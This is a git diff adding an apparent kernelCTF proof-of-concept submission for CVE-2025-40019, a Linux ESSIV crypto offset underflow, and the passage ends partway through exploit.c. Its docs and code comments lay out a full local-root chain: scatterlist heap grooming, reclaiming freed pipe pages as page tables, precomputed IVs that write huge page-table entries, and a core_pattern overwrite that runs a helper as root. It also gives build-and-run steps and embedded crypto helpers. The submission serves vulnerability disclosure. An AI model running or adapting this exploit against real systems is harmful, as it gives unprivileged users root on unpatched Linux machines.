diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md new file mode 100644 index 000000000..232a48089 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md @@ -0,0 +1,67 @@ +# Exploit + +This submission targets `mitigation-v4-6.12` as a novelty-only follow-up for CVE-2025-40019. The regular vulnerability slot for this CVE and target was already taken; the relevant new part is the page-table adaptation described in `docs/novel-techniques.md`. + +## High-Level Flow + +The exploit turns the ESSIV scatterwalk offset underflow into a 16-byte write through a reclaimed scatterlist entry. + +1. Create a sacrificial AF_ALG AEAD request that builds a chained receive scatterlist. +2. Free that request so the inline first receive SGL, a second receive SGL, and the TX SGL (`tsgl`) remain as residual slab contents. +3. Reclaim the second receive SGL slab slot with a Unix socket control-buffer allocation containing a crafted scatterlist entry. +4. Reclaim the freed anonymous pipe pages as user page-table pages. +5. Trigger the ESSIV decryption path with `assoclen == 0` and an output length of zero, so that `scatterwalk_ffwd()` walks the residual SGL chain and the encrypted IV is written into a page-table page. +6. Use a two-pass flow: pass 1 leaks the physical base needed for the target mapping, and pass 2 writes a coredump helper into `core_pattern`. + +The exploit does not use user namespaces, `io_uring`, BPF, or a separate KASLR leak service. + +## Scatterlist Shaping + +The trigger sends exactly 32 bytes to `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. For this transform, the authentication tag size is 32 bytes. During decrypt, `_aead_recvmsg()` computes: + +```text +outlen = used - authsize = 0x20 - 0x20 = 0 +``` + +Because `outlen` is zero, `af_alg_get_rsgl()` does not initialize the receive SGL. 
The request nevertheless passes the receive SGL to ESSIV as both source and destination. The vulnerable ESSIV offset calculation wraps to `0xfffffff0`, so `scatterwalk_ffwd()` walks past the inline SGL and follows stale chain entries. + +The sacrificial request constructs the stale chain before the trigger request: + +```text +first_rsgl[0..15] -> second_rsgl -> tsgl -> anonymous pipe pages +``` + +After the sacrificial request is freed, the exploit reclaims the `second_rsgl` allocation with a Unix socket `msg_control` buffer. The crafted entry supplies a large length value that steers the final `scatterwalk_ffwd()` position into the stale `tsgl` entries. The `tsgl` entries still encode pages that were freed after pipe closure; those pages are then reclaimed as page-table pages by a controlled `mmap()` spray. + +## IV Encoding + +ESSIV encrypts the IV before copying it back. The exploit embeds AES code so it can precompute an IV whose ESSIV encryption equals the desired 16-byte page-table write for the selected pass; the IV it sends is the AES decryption of that desired value. + +In pass 1, the write maps a physical window that contains a known kernel trampoline page. Reading through the resulting huge mapping reveals enough physical address information to derive the `_stext` physical base used by pass 2. + +In pass 2, the write maps the 1 GB physical window containing `core_pattern` and writes the helper payload through the corrupted user mapping. + +## Privilege Escalation + +The payload written into `core_pattern` is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +The `/proc/%P/root` prefix is required because the coredump helper path is resolved outside the process's jail-local mount namespace. The helper reopens the crashing process's standard file descriptors with `pidfd_open()` and `pidfd_getfd()`, then reads the flag from the target VM as root. 
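
The page-table values described under IV Encoding can be modeled with a few lines of C. This is a minimal sketch, assuming the `PUD_HUGE_FLAGS` and `PUD_HUGE_MASK` constants defined in `exploit.c`; the helper names `huge_pud_entry()` and `huge_pud_offset()` and the sample physical address are hypothetical and only illustrate the arithmetic.

```c
#include <assert.h>
#include <stdint.h>

/* Values taken from exploit.c: Present | RW | User | Accessed | Dirty | PSE. */
#define PUD_HUGE_FLAGS 0xe7ULL
/* Low 30 bits: byte offset inside a 1 GB huge page. */
#define PUD_HUGE_MASK  0x3fffffffULL

/* Hypothetical helper: 8-byte huge-PUD value mapping the 1 GB window around phys. */
static uint64_t huge_pud_entry(uint64_t phys)
{
    return (phys & ~PUD_HUGE_MASK) | PUD_HUGE_FLAGS;
}

/* Hypothetical helper: offset of phys inside that 1 GB window. */
static uint64_t huge_pud_offset(uint64_t phys)
{
    return phys & PUD_HUGE_MASK;
}

/* Worked examples; the second address is arbitrary, not a real target. */
static void huge_pud_selfcheck(void)
{
    /* Pass 1: the trampoline page at 0x9c000 sits in the window at base 0. */
    assert(huge_pud_entry(0x9c000ULL) == 0xe7ULL);
    assert(huge_pud_offset(0x9c000ULL) == 0x9c000ULL);

    /* An address above 4 GB splits into a 1 GB-aligned base and an offset. */
    assert(huge_pud_entry(0x123456789ULL) == 0x1000000e7ULL);
    assert(huge_pud_offset(0x123456789ULL) == 0x23456789ULL);
}
```

The base must be 1 GB-aligned for a huge entry, which is why the address is split into a masked base for the entry and an offset that is added to the user virtual address afterwards.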
+ +## Reproduction + +Build and run on `mitigation-v4-6.12`: + +```sh +make +./exploit +``` + +For the vulnerability-only KASAN check: + +```sh +./exploit --vuln-trigger +``` diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md new file mode 100644 index 000000000..9648acbb7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md @@ -0,0 +1,32 @@ +# Novel Technique: Huge-PUD Recovery From a Wrong-Level Page-Table Write + +The existing CVE-2025-40019 exploits targeted the same ESSIV scatterwalk primitive, but this submission handles a different landing condition on `mitigation-v4-6.12`: the repeated page-table write landed on a PUD page instead of a PTE page. + +The usual response to this condition is to treat it as a failed PTE hit. This exploit instead converts the wrong-level page-table write into a useful primitive by writing valid 1 GB huge-PUD entries. + +## Why This Works + +The ESSIV primitive gives a 16-byte write, but the copied value is the encrypted IV. By precomputing the IV, the exploit controls the 16 bytes that the kernel writes after ESSIV transforms it. + +When the reclaimed page is a PUD page, those 16 bytes can be used as two adjacent PUD entries. The exploit writes present, user-accessible huge entries that map a chosen 1 GB physical window into userspace. + +The exploit uses this twice: + +1. Pass 1 maps a physical window that exposes a stable kernel address-derived value, then derives the `_stext` physical base. +2. Pass 2 maps the 1 GB physical window containing `core_pattern`, then writes a coredump helper string through the resulting user mapping. + +This avoids needing the ESSIV write to hit a PTE page. It also avoids ROP and avoids depending on user namespaces or `io_uring`. + +## Namespace-Safe Coredump Helper + +The second novelty is operational rather than a new corruption primitive. 
Writing `|/tmp/ex %P` to `core_pattern` was not reliable in this environment because the kernel resolves the coredump helper outside the jail-local mount namespace. The working payload is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +This resolves the helper through the crashing process's root, so the exploit can install `/tmp/ex` inside the target process namespace while the kernel still starts the correct helper as root. + +## Practical Impact + +This technique makes a page-table exploit usable even when the allocator consistently gives the vulnerable write a PUD page instead of a PTE page. For this target, that changed the result from repeated near-misses into a working mitigation bypass and flag capture. diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md new file mode 100644 index 000000000..38ac9c993 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md @@ -0,0 +1,48 @@ +# CVE-2025-40019 + +## Requirements + +- Capabilities: none +- User namespaces: not required +- io_uring: not required +- Kernel configuration: `CONFIG_CRYPTO_USER_API`, `CONFIG_CRYPTO_USER_API_AEAD`, `CONFIG_CRYPTO_ESSIV` +- Affected component: Linux kernel crypto, ESSIV AEAD template +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be1eb7f78aa8fbe34779c56c266ccd0364604e71 +- Affected versions: v5.4 through v6.18 + +## Summary + +`essiv_aead_crypt()` performs an unchecked unsigned subtraction when copying the encrypted IV back into the destination scatterlist for decryption or in-place encryption. If `req->assoclen` is smaller than the AEAD IV size, the offset passed to `scatterwalk_map_and_copy()` wraps to a large unsigned value. 
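
The wrap described above is ordinary modulo-2^32 arithmetic. The following is a minimal userspace sketch, not kernel code: `essiv_copy_offset()` and `essiv_lengths_ok()` are hypothetical names that model the unchecked expression and a signed check made before the offset is used.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical model of the offset expression: both operands are unsigned. */
static uint32_t essiv_copy_offset(uint32_t assoclen, uint32_t ivsize)
{
    /* Unsigned 32-bit subtraction wraps modulo 2^32 instead of going negative. */
    return assoclen - ivsize;
}

/* Hypothetical model of a signed validation performed before the offset is used. */
static int essiv_lengths_ok(uint32_t assoclen, uint32_t ivsize)
{
    int64_t ssize = (int64_t)assoclen - (int64_t)ivsize;
    return ssize >= 0;
}

/* Worked example with the values from this report. */
static void essiv_offset_selfcheck(void)
{
    assert(essiv_copy_offset(0, 16) == 0xfffffff0u); /* assoclen == 0 wraps */
    assert(!essiv_lengths_ok(0, 16));                /* a signed check rejects it */
    assert(essiv_copy_offset(16, 16) == 0);          /* smallest valid assoclen */
    assert(essiv_lengths_ok(16, 16));
}
```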
+ +The vulnerable path is reachable by an unprivileged local user through AF_ALG AEAD sockets using the ESSIV template, for example `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. + +## Root Cause + +In the vulnerable code, the decryption and in-place paths copy the transformed IV to: + +```c +scatterwalk_map_and_copy(req->iv, req->dst, + req->assoclen - crypto_aead_ivsize(tfm), + crypto_aead_ivsize(tfm), 1); +``` + +`req->assoclen` and `crypto_aead_ivsize(tfm)` are unsigned. With `assoclen == 0` and `ivsize == 16`, the subtraction becomes `0xfffffff0`. The later `ssize < 0` check existed only in the out-of-place encryption path, so it did not protect decryption or in-place encryption. + +AF_ALG allows userspace to set `ALG_SET_AEAD_ASSOCLEN` to zero and then issue a decrypt request. In `_aead_recvmsg()`, sending exactly the authentication tag size makes the receive output length zero. That causes `af_alg_get_rsgl()` to return without initializing the receive scatterlist, while the ESSIV layer still receives that scatterlist as `req->dst`. + +The wrapped offset makes `scatterwalk_ffwd()` walk beyond the initialized scatterlist entries and eventually treat residual heap data as a scatterlist entry. The ESSIV layer then writes the 16-byte encrypted IV to the page, offset, and length described by that residual or reclaimed entry. + +## Fix + +The fix moves the signed size validation to the start of `essiv_aead_crypt()`, before the decryption and in-place paths can use the underflowed value. + +## Minimal Trigger + +The submitted exploit supports: + +```sh +./exploit --vuln-trigger +``` + +That mode opens the ESSIV AF_ALG AEAD transform, sends a decrypt request with `ALG_SET_AEAD_ASSOCLEN = 0`, and calls `recv()` without the heap grooming or privilege escalation stages. 
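
The walk described under Root Cause can be followed with a small model of how a fast-forward consumes an offset across entry lengths. This is a hedged userspace sketch, not the kernel's `scatterwalk_ffwd()`: `model_ffwd()` is a hypothetical helper, chain links are omitted, the 16 one-byte entries and the `0xffffffe0` crafted length come from the comments in `exploit.c`, and the length of the final stale entry is assumed for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical model: skip entries while the remaining offset is at least as
 * large as the current entry's length. Returns the index of the entry where
 * the walk stops and stores the leftover offset in *residual.
 */
static size_t model_ffwd(const uint32_t *lengths, size_t n,
                         uint32_t offset, uint32_t *residual)
{
    size_t i = 0;

    while (i < n && offset != 0 && lengths[i] <= offset) {
        offset -= lengths[i];
        i++;
    }
    *residual = offset;
    return i;
}

/* Worked example: the wrapped offset 0xfffffff0 over the stale chain. */
static void model_ffwd_selfcheck(void)
{
    uint32_t lengths[18];
    uint32_t residual = 0;

    for (size_t i = 0; i < 16; i++)
        lengths[i] = 1;            /* 16 one-byte inline entries */
    lengths[16] = 0xffffffe0u;     /* crafted entry in the reclaimed slot */
    lengths[17] = 4;               /* stale entry; length assumed here */

    size_t idx = model_ffwd(lengths, 18, 0xfffffff0u, &residual);
    assert(idx == 17);             /* walk stops on the stale entry */
    assert(residual == 0);         /* at offset 0 within it */
}
```

The 16 one-byte entries reduce the offset to `0xffffffe0`, the crafted entry consumes exactly that remainder, and the walk therefore stops at the start of the entry that follows it.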
diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile new file mode 100644 index 000000000..65c989aeb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -0,0 +1,21 @@ +CC ?= gcc +CFLAGS ?= -O2 -w -DMIT_612 +DEBUG_CFLAGS ?= -O2 -g -w -DMIT_612 +STATIC_LDFLAGS ?= -static + +all: exploit + +exploit: exploit.c wrapper.c + $(CC) -B/usr/bin/ $(CFLAGS) -o payload_bin exploit.c + cp /lib64/ld-linux-x86-64.so.2 ld_bin + if [ -e /lib/x86_64-linux-gnu/libc.so.6 ]; then cp /lib/x86_64-linux-gnu/libc.so.6 libc_bin; else cp /usr/lib64/libc.so.6 libc_bin; fi + ld -r -b binary -o payload_bin.o payload_bin + ld -r -b binary -o ld_bin.o ld_bin + ld -r -b binary -o libc_bin.o libc_bin + $(CC) -B/usr/bin/ -O2 -w $(STATIC_LDFLAGS) -o exploit wrapper.c payload_bin.o ld_bin.o libc_bin.o + +exploit_debug: exploit.c + $(CC) -B/usr/bin/ $(DEBUG_CFLAGS) -o $@ $< $(STATIC_LDFLAGS) + +clean: + rm -f exploit exploit_debug payload_bin ld_bin libc_bin payload_bin.o ld_bin.o libc_bin.o diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit new file mode 100755 index 000000000..66dd8f1d1 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c new file mode 100644 index 000000000..c07ab8e62 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c @@ -0,0 +1,1019 @@ +/* + * CVE-2025-40019: Integer overflow in essiv_aead_crypt (crypto/essiv.c) + * Adapted for mitigation-v4-6.12 (kernel 6.12.0) + * 
+ * Compile: gcc -B/usr/bin/ -O2 -w -DMIT_612 -o /tmp/ex /tmp/ex.c + * (NO -lssl -lcrypto -- all crypto is embedded) + * + * Exploit chain: + * 1. essiv_aead_crypt integer overflow: assoclen(0) - ivsize(16) = 0xfffffff0 + * causes scatterwalk_map_and_copy to write the 16-byte encrypted IV to an + * out-of-bounds scatterlist entry. + * 2. Uninitialized RX SGL: sending exactly authsize (32) bytes makes + * outlen = used - as = 0, so af_alg_get_rsgl returns early without + * calling sg_init_table -- the entire first_rsgl.sgl.sgl[] is uninitialized. + * 3. Chained SGL residual: a sacrificial authenc recvmsg with 32 iovecs + * builds a chained SGL: first_rsgl[0..15] (16 x 1-byte entries) -> chain -> + * second_rsgl -> chain -> tsgl (anonymous pipe pages from splice). + * af_alg_free_resources frees everything; put_page on pipe pages releases + * them to the page allocator. Slab slots retain residual chain links. + * 4. ctl_buf spray: sendmsg on Unix socket with msg_control = 0x208 bytes. + * ____sys_sendmsg does sock_kmalloc -> copy -> sock_kfree_s, reclaiming the + * second_rsgl slab slot with a crafted fake SGL entry (length=0xffffffe0). + * The chain link to old tsgl (at higher offset) is preserved as residual. + * 5. PTE spray + trigger: touch mmap'd pages to allocate PTE pages, reclaiming + * freed pipe pages. ESSIV recv allocates areq from same slab slot; + * scatterwalk_ffwd walks residual chain: 16 x 1 byte -> crafted entry + * (0xffffffe0) -> chain -> tsgl entry -> freed pipe page (now PTE page). + * IV write overwrites a PTE encoding a known physical address. + * 6. Two-pass exploit: pass 1 leaks _stext physical address via PTE remap; + * pass 2 targets core_pattern physical page. Crash child for root. 
+ */ +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <stdint.h> +#include <unistd.h> +#include <err.h> +#include <fcntl.h> +#include <sched.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <sys/uio.h> +#include <sys/un.h> +#include <sys/mman.h> +#include <sys/wait.h> +#include <linux/if_alg.h> + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + +/* ================================================================== */ +/* Embedded AES-256-ECB (decrypt only) -- derived from tiny-AES-c */ +/* Public domain / CC0: https://github.com/kokke/tiny-AES-c */ +/* ================================================================== */ + +#define AES_BLOCKLEN 16 +#define AES_KEYLEN 32 +#define AES_keyExpSize 240 +#define Nb 4 +#define Nk 8 +#define Nr 14 + +typedef uint8_t state_t[4][4]; + +struct AesCtx { + uint8_t RoundKey[AES_keyExpSize]; +}; + +static const uint8_t sbox[256] = { + 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76, + 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0, + 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15, + 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75, + 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84, + 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf, + 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8, + 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2, + 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73, + 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb, + 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79, + 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08, + 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a, + 
0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e, + 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf, + 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16 +}; + +static const uint8_t rsbox[256] = { + 0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38,0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb, + 0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87,0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb, + 0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d,0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e, + 0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2,0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25, + 0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16,0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92, + 0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda,0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84, + 0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a,0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06, + 0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02,0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b, + 0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea,0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73, + 0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85,0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e, + 0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89,0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b, + 0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20,0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4, + 0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31,0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f, + 0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d,0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef, + 0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0,0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61, + 0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26,0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d +}; + +static const uint8_t Rcon[11] = { + 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36 +}; + +#define getSBoxValue(num) (sbox[(num)]) +#define getSBoxInvert(num) (rsbox[(num)]) + +static void KeyExpansion(uint8_t *RoundKey, const uint8_t *Key) +{ + unsigned i, j, k; + uint8_t tempa[4]; + + for (i = 0; i < Nk; ++i) { + RoundKey[(i * 4) + 0] = Key[(i * 4) + 0]; 
+ RoundKey[(i * 4) + 1] = Key[(i * 4) + 1]; + RoundKey[(i * 4) + 2] = Key[(i * 4) + 2]; + RoundKey[(i * 4) + 3] = Key[(i * 4) + 3]; + } + + for (i = Nk; i < Nb * (Nr + 1); ++i) { + k = (i - 1) * 4; + tempa[0] = RoundKey[k + 0]; + tempa[1] = RoundKey[k + 1]; + tempa[2] = RoundKey[k + 2]; + tempa[3] = RoundKey[k + 3]; + + if (i % Nk == 0) { + /* RotWord */ + uint8_t u8tmp = tempa[0]; + tempa[0] = tempa[1]; + tempa[1] = tempa[2]; + tempa[2] = tempa[3]; + tempa[3] = u8tmp; + /* SubWord */ + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + tempa[0] = tempa[0] ^ Rcon[i / Nk]; + } + if (i % Nk == 4) { + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + } + j = i * 4; k = (i - Nk) * 4; + RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0]; + RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1]; + RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2]; + RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3]; + } +} + +static void AddRoundKey(uint8_t round, state_t *state, const uint8_t *RoundKey) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j]; +} + +static void InvSubBytes(state_t *state) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[j][i] = getSBoxInvert((*state)[j][i]); +} + +static void InvShiftRows(state_t *state) +{ + uint8_t temp; + /* Row 1: shift right 1 */ + temp = (*state)[3][1]; + (*state)[3][1] = (*state)[2][1]; + (*state)[2][1] = (*state)[1][1]; + (*state)[1][1] = (*state)[0][1]; + (*state)[0][1] = temp; + /* Row 2: shift right 2 */ + temp = (*state)[0][2]; + (*state)[0][2] = (*state)[2][2]; + (*state)[2][2] = temp; + temp = (*state)[1][2]; + (*state)[1][2] = (*state)[3][2]; + (*state)[3][2] = temp; + /* Row 3: shift right 3 */ + temp = (*state)[0][3]; + (*state)[0][3] = 
(*state)[1][3]; + (*state)[1][3] = (*state)[2][3]; + (*state)[2][3] = (*state)[3][3]; + (*state)[3][3] = temp; +} + +static uint8_t xtime(uint8_t x) +{ + return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); +} + +static uint8_t Multiply(uint8_t x, uint8_t y) +{ + return (((y & 1) * x) ^ + ((y >> 1 & 1) * xtime(x)) ^ + ((y >> 2 & 1) * xtime(xtime(x))) ^ + ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ + ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))); +} + +static void InvMixColumns(state_t *state) +{ + uint8_t a, b, c, d; + for (int i = 0; i < 4; ++i) { + a = (*state)[i][0]; + b = (*state)[i][1]; + c = (*state)[i][2]; + d = (*state)[i][3]; + (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); + (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); + (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); + (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); + } +} + +static void InvCipher(state_t *state, const uint8_t *RoundKey) +{ + AddRoundKey(Nr, state, RoundKey); + for (uint8_t round = (Nr - 1); ; --round) { + InvShiftRows(state); + InvSubBytes(state); + AddRoundKey(round, state, RoundKey); + if (round == 0) break; + InvMixColumns(state); + } +} + +static void aes256_ecb_decrypt(const uint8_t *key, const uint8_t *in, uint8_t *out) +{ + struct AesCtx ctx; + KeyExpansion(ctx.RoundKey, key); + memcpy(out, in, AES_BLOCKLEN); + InvCipher((state_t *)out, ctx.RoundKey); +} + +/* ================================================================== */ +/* Embedded SHA-256 (minimal, single-use) */ +/* ================================================================== */ + +static const uint32_t sha256_k[64] = { + 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5, + 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174, + 
0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da, + 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967, + 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85, + 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070, + 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3, + 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2 +}; + +#define SHA_ROTR(x,n) (((x) >> (n)) | ((x) << (32-(n)))) +#define SHA_CH(x,y,z) (((x) & (y)) ^ (~(x) & (z))) +#define SHA_MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z))) +#define SHA_EP0(x) (SHA_ROTR(x,2) ^ SHA_ROTR(x,13) ^ SHA_ROTR(x,22)) +#define SHA_EP1(x) (SHA_ROTR(x,6) ^ SHA_ROTR(x,11) ^ SHA_ROTR(x,25)) +#define SHA_SIG0(x) (SHA_ROTR(x,7) ^ SHA_ROTR(x,18) ^ ((x) >> 3)) +#define SHA_SIG1(x) (SHA_ROTR(x,17) ^ SHA_ROTR(x,19) ^ ((x) >> 10)) + +static void sha256_transform(uint32_t state[8], const uint8_t data[64]) +{ + uint32_t a, b, c, d, e, f, g, h, t1, t2, m[64]; + int i; + + for (i = 0; i < 16; ++i) + m[i] = ((uint32_t)data[i*4] << 24) | ((uint32_t)data[i*4+1] << 16) | + ((uint32_t)data[i*4+2] << 8) | ((uint32_t)data[i*4+3]); + for (; i < 64; ++i) + m[i] = SHA_SIG1(m[i-2]) + m[i-7] + SHA_SIG0(m[i-15]) + m[i-16]; + + a = state[0]; b = state[1]; c = state[2]; d = state[3]; + e = state[4]; f = state[5]; g = state[6]; h = state[7]; + + for (i = 0; i < 64; ++i) { + t1 = h + SHA_EP1(e) + SHA_CH(e,f,g) + sha256_k[i] + m[i]; + t2 = SHA_EP0(a) + SHA_MAJ(a,b,c); + h = g; g = f; f = e; e = d + t1; + d = c; c = b; b = a; a = t1 + t2; + } + + state[0] += a; state[1] += b; state[2] += c; state[3] += d; + state[4] += e; state[5] += f; state[6] += g; state[7] += h; +} + +/* + * Compute SHA-256 of (data, datalen). Output is 32 bytes in hash_out. + * Minimal implementation -- handles any length up to ~2^32 bytes. 
